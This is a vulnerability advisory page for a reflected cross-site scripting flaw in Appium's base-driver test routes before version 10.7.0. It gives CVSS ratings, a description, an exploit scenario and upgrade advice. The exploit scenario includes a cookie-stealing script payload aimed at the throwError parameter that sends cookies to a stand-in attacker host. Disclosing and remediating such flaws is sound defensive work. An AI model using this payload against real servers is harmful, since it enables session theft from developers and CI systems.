Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Network-accessible routes, no attacker auth needed (PR:N), but victim must visit URL (UI:R); C:L added because XSS enables cookie and session token theft beyond integrity-only impact.
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
3DescriptionNVD
Appium is a cross-platform automation framework for all kinds of apps, built on top of the W3C WebDriver protocol. Prior to 10.7.0, Appium's base-driver unconditionally mounts the /test/guinea-pig, /test/guinea-pig-scrollable, and /test/guinea-pig-app-banner routes, and compileLodashTemplate reflects the throwError query parameter, comments POST field, and User-Agent request header into HTML without escaping, allowing reflected cross-site scripting and arbitrary JavaScript execution on the server origin. This issue is fixed in version 10.7.0.
AnalysisAI
Reflected cross-site scripting in Appium's base-driver allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser on the Appium server origin. All Appium installations prior to 10.7.0 unconditionally expose three test routes whose compileLodashTemplate handler reflects unsanitized user-controlled inputs - the throwError query parameter, the comments POST field, and the User-Agent request header - directly into rendered HTML without output encoding. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The Appium server (prior to 10.7.0) must be network-reachable from the attacker - either directly via an exposed port, through an internal network the attacker has access to, or via SSRF from another reachable service. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor-provided CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N, score 6.5) scores this as Medium severity, driven by the High integrity impact of arbitrary JavaScript execution and tempered by the required user interaction (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who can observe or predict that a developer or CI agent has a running Appium server on a reachable network interface crafts a URL targeting `/test/guinea-pig?throwError=<script>document.location='https://attacker.example/steal?c='+document.cookie</script>` and delivers it via phishing email, a malicious link in a Slack message, or an SSRF-capable redirect. When the victim's browser loads the URL against the Appium server origin, the injected script executes and exfiltrates any origin-scoped session material. … |
| Remediation | Upgrade Appium to version 10.7.0 or later, which removes or properly escapes the reflected inputs in the affected test route handlers; this is the primary and confirmed fix per vendor advisory GHSA-3wgp-x9p5-c7cc at https://github.com/appium/appium/security/advisories/GHSA-3wgp-x9p5-c7cc. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42425